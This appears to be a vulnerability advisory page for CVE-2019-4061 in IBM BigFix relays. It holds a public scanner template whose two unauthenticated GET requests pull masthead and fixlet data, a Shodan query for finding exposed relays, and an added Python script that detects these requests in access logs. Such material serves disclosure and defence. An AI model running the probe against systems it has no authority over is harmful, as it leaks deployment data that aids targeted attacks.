CVE-2019-4061: IBM BigFix Platform - Information Disclosure

Date: 2025-12-12 | Affected software: IBM BigFix Platform | PoC: Public

Vulnerability Description

IBM BigFix Platform 9.2 and 9.5 contain an information disclosure vulnerability: authenticated access is not enabled on the relay, so remote attackers can query and gather update and fixlet information. Exploitation requires no authentication.

PoC code [public]

id: CVE-2019-4061

info:
  name: IBM BigFix Platform - Information Disclosure
  author: daffainfo
  severity: medium
  description: |
    IBM BigFix Platform 9.2 and 9.5 contains an information disclosure vulnerability caused by not enabling authenticated access in relay, letting remote attackers query and gather update and fixlet information, exploit requires no authentication.
  impact: |
    Attackers can remotely gather sensitive update and fixlet deployment information, potentially aiding targeted attacks.
  remediation: |
    Enable authenticated access for relay to prevent unauthorized information queries.
  reference:
    - https://www.atredis.com/blog/2019/3/18/harvesting-data-from-bigfix-relay-servers
    - https://github.com/rapid7/metasploit-framework/blob/0fd8f0984e10a135c000d1fb8797d76d62fb24f7/modules/auxiliary/gather/ibm_bigfix_sites_packages_enum.rb
    - https://nvd.nist.gov/vuln/detail/CVE-2019-4061
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
    cvss-score: 5.3
    cve-id: CVE-2019-4061
    epss-score: 0.72958
    epss-percentile: 0.98719
    cwe-id: CWE-200
    cpe: cpe:2.3:a:ibm:bigfix_platform:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: ibm
    product: bigfix_platform
    shodan-query: port:52311 "BigFixHTTPServer"
  tags: cve,cve2019,ibm,bigfix,disclosure,vkev

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/masthead/masthead.axfm"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "Organization: ", "-URL: ")'
        condition: and
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/bfenterprise/clientregister.exe?RequestType=FetchCommands"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "x-bes-command-hasiteversion:")'
        condition: and
# digest: 4a0a0047304502210081e822a156889d79159f5bedda964cfb84db60bb4b08f263e2ae95097cb7a57a02203adde0da88c5bf98e75dd3e299386ab1528deeddc6117781b9be488237017fd6:922c64590222798bb761d5b6d8e72950
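
A defender-side check to go with the template above, as an added example (not part of the original template or of any IBM or scanner code): it scans access logs for successful requests to the two paths the template uses, coming from addresses outside the managed client networks. The Common Log Format source (a proxy or firewall in front of the relay), the network range and the sample lines are assumptions constructed for illustration.

```python
import ipaddress
import re
from collections import defaultdict

# Request paths taken from the template's two HTTP steps (lower-cased).
MASTHEAD = "/masthead/masthead.axfm"
FETCH = "/cgi-bin/bfenterprise/clientregister.exe"

# Assumed format: Common Log Format from a proxy/firewall in front of the relay.
LINE_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "GET (?P<uri>\S+) [^"]*" (?P<status>\d{3}) ')

def classify(uri):
    """Map a request URI to the template step it matches, or None."""
    path, _, query = uri.partition("?")
    if path.lower() == MASTHEAD:
        return "masthead"
    if path.lower() == FETCH and "requesttype=fetchcommands" in query.lower():
        return "fetch"
    return None

def find_unexpected_queries(lines, managed_networks):
    """Return {source_ip: sorted steps seen} for HTTP 200 relay queries
    from addresses outside the managed client networks."""
    nets = [ipaddress.ip_network(n) for n in managed_networks]
    seen = defaultdict(set)
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["status"] != "200":
            continue  # unparsable line, or the relay refused the query
        step = classify(m["uri"])
        if step is None:
            continue
        try:
            src = ipaddress.ip_address(m["src"])
        except ValueError:
            continue  # source field is a hostname or malformed
        if not any(src in n for n in nets):
            seen[str(src)].add(step)
    return {ip: sorted(steps) for ip, steps in seen.items()}

# Constructed sample log lines (private and documentation address ranges).
SAMPLE_LOG = [
    '10.20.1.15 - - [12/Dec/2025:10:00:01 +0000] "GET /cgi-bin/bfenterprise/clientregister.exe?RequestType=FetchCommands HTTP/1.1" 200 512',
    '203.0.113.7 - - [12/Dec/2025:10:02:11 +0000] "GET /masthead/masthead.axfm HTTP/1.1" 200 2048',
    '203.0.113.7 - - [12/Dec/2025:10:02:12 +0000] "GET /cgi-bin/bfenterprise/clientregister.exe?RequestType=FetchCommands HTTP/1.1" 200 731',
    '198.51.100.9 - - [12/Dec/2025:10:05:40 +0000] "GET /cgi-bin/bfenterprise/clientregister.exe?RequestType=FetchCommands HTTP/1.1" 403 0',
]

if __name__ == "__main__":
    print(find_unexpected_queries(SAMPLE_LOG, ["10.20.0.0/16"]))
```

A source that shows both steps with status 200 received the same responses the template matches on, which means the relay answered it without authentication.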
